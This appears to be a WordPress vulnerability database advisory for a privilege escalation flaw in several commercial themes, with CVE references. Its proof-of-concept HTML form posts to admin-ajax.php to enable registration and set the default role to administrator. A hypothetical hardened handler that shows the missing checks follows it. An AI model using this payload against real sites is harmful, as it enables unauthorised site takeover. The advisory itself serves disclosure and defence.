Multiple Themes - Privilege Escalation



Description
The themes suffer from a privilege escalation vulnerability: because of weak permission checking, any authenticated user can trigger it.

An attacker can update options, such as the default user role, the registration state and others, which may lead to executing commands/code on the server and taking over the website.

Tested Versions:

Simpolio 1.3.2
Pont 1.5
Teardrop 1.8.1
Vernissage 1.2.8
Proof of Concept
<form action="http://example.com/wp-admin/admin-ajax.php?action=of_ajax_post_action" method="post" >
	<input name="type" value="save" type="hidden" />
	<input name="data[users_can_register]" value="1" type="hidden" />
	<input name="data[default_role]" value="administrator" type="hidden" />
	<input type="submit" >
</form>
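
The missing checks, shown as an added example of a hardened handler for the same AJAX action (this is not the themes' own code). The function name, the nonce action `of_ajax_nonce`, the request field `security`, the option name `example_theme_options` and the allow-listed keys are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened handler, not code from the affected themes.

// Hook only wp_ajax_ (logged-in users); do not add a wp_ajax_nopriv_ hook.
add_action( 'wp_ajax_of_ajax_post_action', 'example_of_ajax_save' );

function example_of_ajax_save() {
    // 1. CSRF: require a nonce issued by the theme options page.
    //    check_ajax_referer() terminates the request when the nonce is invalid.
    check_ajax_referer( 'of_ajax_nonce', 'security' ); // assumed nonce action/field

    // 2. Authorization: being logged in is not enough, require an admin capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $type = isset( $_POST['type'] ) ? sanitize_key( wp_unslash( $_POST['type'] ) ) : '';
    if ( 'save' !== $type ) {
        wp_send_json_error( 'unsupported type', 400 );
    }

    $data = ( isset( $_POST['data'] ) && is_array( $_POST['data'] ) )
        ? wp_unslash( $_POST['data'] )
        : array();

    // 3. Scope: accept only known theme settings, so request keys such as
    //    users_can_register or default_role can never reach update_option().
    $allowed  = array( 'example_logo_url', 'example_footer_text' ); // hypothetical keys
    $settings = get_option( 'example_theme_options', array() );

    foreach ( $data as $key => $value ) {
        if ( in_array( $key, $allowed, true ) && is_scalar( $value ) ) {
            $settings[ $key ] = sanitize_text_field( $value );
        }
    }

    // Store everything under one theme-owned option instead of one option per key.
    update_option( 'example_theme_options', $settings );
    wp_send_json_success();
}
```

With these checks the form above is rejected three times over: it carries no nonce, a subscriber lacks `manage_options`, and neither submitted key is on the allow-list.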

Affects Themes

References

CVE 2015-9477
CVE 2015-9476
CVE 2015-9475
CVE 2015-9474
URL https://web.archive.org/web/20150914160724/https://research.evex.pw/?vuln=17
URL https://themeforest.net/item/vernissage-responsive-photographyportfolio-theme/4436204

Classification

Type BYPASS

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 9101
Verified No
WPVDB ID 8061

Timeline

Publicly Published 2015-06-26 (over 4 years ago)
Added 2015-06-26 (over 4 years ago)
Last Updated 2019-10-31 (13 days ago)
